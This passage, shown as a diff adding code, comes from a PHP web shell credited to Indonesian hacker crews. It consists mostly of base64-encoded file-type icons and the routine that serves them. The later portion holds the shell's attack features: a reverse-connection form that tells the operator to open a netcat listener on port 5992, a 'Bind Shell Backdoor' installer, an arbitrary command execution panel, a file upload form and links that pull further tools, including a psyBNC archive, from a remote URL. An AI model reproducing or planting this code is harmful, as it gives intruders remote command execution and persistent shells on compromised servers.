+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0OqpaGeyYpqJlRG/rlwAADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+);
+//Untuk optimalisasi ukuran dan kecepatan.
+$imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+);
+if (!$getall) {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+}
+else {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+}
+exit;
+}
+if ($act == "about") {
+  echo "<center><b>Credits:</b><br>Idea, leading and coding by <b>tristram [CCTeaM]</b><br>Beta-testing and some tips by <b>NukLeoN [AnTiSh@Re tEaM]</b><br>Re-Coding, tricks, and css by <b>dhie-Q [LamPuNG-HacKerR]</b><br><br> Thanks all who report bugs<br>Please report bugs to <a href=\"mailto:q.dhie@yahoo.com\">dhie-Q</a></b>";
+}
+if ($act == "backc") {
+  $ip = $_SERVER["REMOTE_ADDR"];
+  $msg = $_POST['backcconnmsg'];
+  $emsg = $_POST['backcconnmsge'];
+  echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
+  echo("$msg");
+  echo("$emsg");
+}
+if ($act == "shbd"){
+  $msg = $_POST['backcconnmsg'];
+  $emsg = $_POST['backcconnmsge'];
+  echo("<center><b>Bind Shell Backdoor:</b><br><br><form name=form method=POST>
+  Bind Port: <input type='text' name='backconnectport' value='5992'>
+  <input type='hidden' name='use' value='shbd'>
+  <input type='submit' value='Install Backdoor'></form>");
+  echo("$msg");
+  echo("$emsg");
+  echo("</center>");
+}
+echo "</td></tr></table>\n";
+//COMMANDS PANEL
+?>
+<div  class=barheader2><b>.: COMMANDS PANEL :.</b></div>
+<table class=mainpanel>
+<?php
+if (!$safemode) {
+?>
+<tr><td align=right>Command:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>">
+    <input type=hidden name="cmd_txt" value="1"> - <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Quick Commands:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type=hidden name="cmd_txt" value="1">
+    <select name="cmd">
+    <?php
+    foreach ($cmdaliases as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    foreach ($cmdaliases2 as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    ?>
+    </select> -
+    <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<?php
+}
+?>
+
+<tr><td align=right>Upload:</td>
+<td><form method="POST" enctype="multipart/form-data">
+    <input type=hidden name=act value="upload">
+    <input type=hidden name="miniform" value="1">
+    <input type="file" name="uploadfile"> - <input type=submit name=submit value="Upload"> <?php echo $wdt; ?>
+    </form>
+</td></tr>
+<?php /* dhie-Q TriCkz */ ?>
+<script language="javascript">
+function set_arg(txt1,txt2) {
+  document.forms.fphpfsys.arg1.value = txt1;
+  document.forms.fphpfsys.arg2.value = txt2;
+  }
+</script>
+<tr><td align=right>PHP Filesystem:</td>
+<td><form name="fphpfsys" method="POST"><input type=hidden name=act value="phpfsys"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <select name="phpfsysfunc">
+    <?php
+    foreach ($phpfsaliases as $als) {
+      if ($als[1]==$phpfsysfunc) { echo "<option selected value=\"".$als[1]."\">".$als[0]."</option>"; }
+      else { echo "<option value=\"".$als[1]."\">".$als[0]."</option>";  }
+    }
+    ?>
+    </select>
+    File/Dir/URL: <input type="text" name="arg1" id="a1" size="40" value="<?php echo htmlspecialchars($arg1); ?>">
+    To/Max: <input type="text" name="arg2" size="50" value="<?php echo htmlspecialchars($arg2); ?>">
+    <input type=submit name=submit value="Execute"><hr noshade size=1>
+    <a href="#" onclick="set_arg('<?php echo $sh_mainurl."kiddie.txt"; ?>','kiddie.php')">[fx29sh]</a>
+    <a href="#" onclick="set_arg('<?php echo $sh_mainurl."dQ.tar.gz"; ?>','dQ.tar.gz')">[psyBNC]</a>
